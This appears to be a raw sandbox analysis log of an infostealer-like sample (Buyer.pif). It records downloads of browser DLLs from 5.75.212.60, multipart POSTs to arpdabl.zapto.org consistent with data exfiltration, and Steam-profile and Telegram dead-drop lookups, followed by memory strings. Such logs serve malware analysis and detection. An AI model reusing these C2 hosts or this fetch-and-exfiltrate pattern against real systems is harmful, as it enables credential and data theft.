                    Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: arpdabl.zapto.org Content-Length: 3257 Connection: Keep-Alive Cache-Control: no-cache
                    Source: unknown TCP traffic detected without corresponding DNS query: 5.75.212.60
                    Source: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif Code function: 11_2_00FBD5B3 InternetReadFile,SetEvent,GetLastError,SetEvent, 11_2_00FBD5B3
                    Source: global traffic HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Connection: Keep-Alive Cache-Control: no-cache
                    Source: global traffic DNS traffic detected: DNS query: BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW
                    Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                    Source: global traffic DNS traffic detected: DNS query: arpdabl.zapto.org
                    Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 5.75.212.60 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                    Source: HDGCAA.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: HDGCAA.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: HDGCAA.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                    Source: BKFCAF.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                    Source: Buyer.pif, 0000000B.00000002.2536907553.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/
                    Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/about/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/explore/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/legal/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/mobile
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/news/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privac
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: AFIEGI.11.drString found in binary or memory: https://support.mozilla.org
                    Source: AFIEGI.11.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: AFIEGI.11.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2a
                    Source: Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                    Source: file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                    Source: Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: HDGCAA.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Buyer.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: HDGCAA.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.000000000421A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.000000000421A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.000000000421A000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/IJKEBFBFHI
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                    Source: Buyer.pif, 0000000B.00000003.2427841362.0000000012DF4000.00000004.00000800.00020000.00000000.sdmp, AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                    Source: AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: Buyer.pif, 0000000B.00000003.2427841362.0000000012DF4000.00000004.00000800.00020000.00000000.sdmp, AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2541067833.000000000C59F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                    Source: Buyer.pif, 0000000B.00000002.2537708757.0000000004220000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                    Source: Buyer.pif, 0000000B.00000003.2427841362.0000000012DF4000.00000004.00000800.00020000.00000000.sdmp, AFIEGI.11.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: unknown HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:49704 version: TLS 1.2
